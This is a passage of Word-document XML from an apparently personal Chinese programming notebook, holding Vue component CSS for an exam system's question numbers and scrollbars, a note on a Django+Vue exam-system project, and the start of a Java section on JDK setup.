        <w:t xml:space="preserve">          type: 'warning',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27510F51" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          callback: () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC54D0C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29AF29" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59317DA7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE4DA0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4EAC8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FFDEE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D764B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FFE520" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5505DA36" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!-- Add "scoped" attribute to limit CSS to this component only --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C911E6F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style scoped&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464979D7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>h1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD40E11" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C574C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  font-weight: normal;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DF67E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01863198" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14294467" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ul {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31CF08" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  list-style-type: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E019F2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  padding: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50254D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3EF00" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE4A413" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>li {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177734E9" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53359779" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  margin: 0 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00EC13" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D7D0E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236347FF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDC72C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  color: #42b983;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5EAC0B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FAD94C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476EEE08" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE964E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.tihao {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8E94F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB2D4D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  justify-content: space-around;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5C640" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC378F0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75037A68" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.ti {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217BE537" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29152528" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  width: 25px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F2F86" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  height: 25px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320EDFCD" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  line-height: 27px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC972E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  border: 1px solid #bbb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30CC81" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  color: #bbb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A223007" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C995B1A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248D721" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71C8EF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B36384A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A42F4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  background-color: blue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C875CD6" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001618D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50080F9A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604B5552" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置滚动条的宽度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45151257" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.scroll-container::-webkit-scrollbar {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D6E7E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  width: thin !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534BE47" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53746FDA" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F3D1AB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滚动条的轨道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF4DF0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.scroll-container::-webkit-scrollbar-track {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1DA83C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  background: #f1f1f1 !important; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBDA8A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218BCAAF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEB5A4B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滚动条的滑块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3A400" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.scroll-container::-webkit-scrollbar-thumb {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE742AD" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  background: #888 !important; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5ED46" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C5BBD" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E783C2D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标悬停在滚动条上时的样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A94E03" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.scroll-container::-webkit-scrollbar-thumb:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B227D63" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  background: #555 !important; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253136ED" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C14F497" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF84488" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216A0307" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40150F18" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1210B3" w14:textId="30C393FE" w:rsidR="0000375B" w:rsidRDefault="0000375B" w:rsidP="0000375B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Django+VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实战：徐总的考试系统开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F3691" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69601D11" w14:textId="14D69D03" w:rsidR="00BB10C9" w:rsidRDefault="0074758D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>023.12.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>024.3.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，徐总、任总让我做考试系统的开发，我目前为止已经大部分做完。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C101CE" w14:textId="77777777" w:rsidR="0074758D" w:rsidRDefault="0074758D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CA7D94" w14:textId="77777777" w:rsidR="0074758D" w:rsidRDefault="0074758D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11387522" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131B56F5" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD4050D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E02255B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65809C55" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD25C81" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558A5AED" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0645D896" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4092B661" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="716" w:name="_Toc159780146"/>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="716"/>
    </w:p>
    <w:p w14:paraId="576B7071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="717" w:name="_Toc159780147"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Base</w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>
    </w:p>
    <w:p w14:paraId="4FC58AA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="718" w:name="_Toc159780148"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性常识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="718"/>
    </w:p>
    <w:p w14:paraId="6864D5D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址及环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CD3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址，下载自己的平台：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0CF81D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
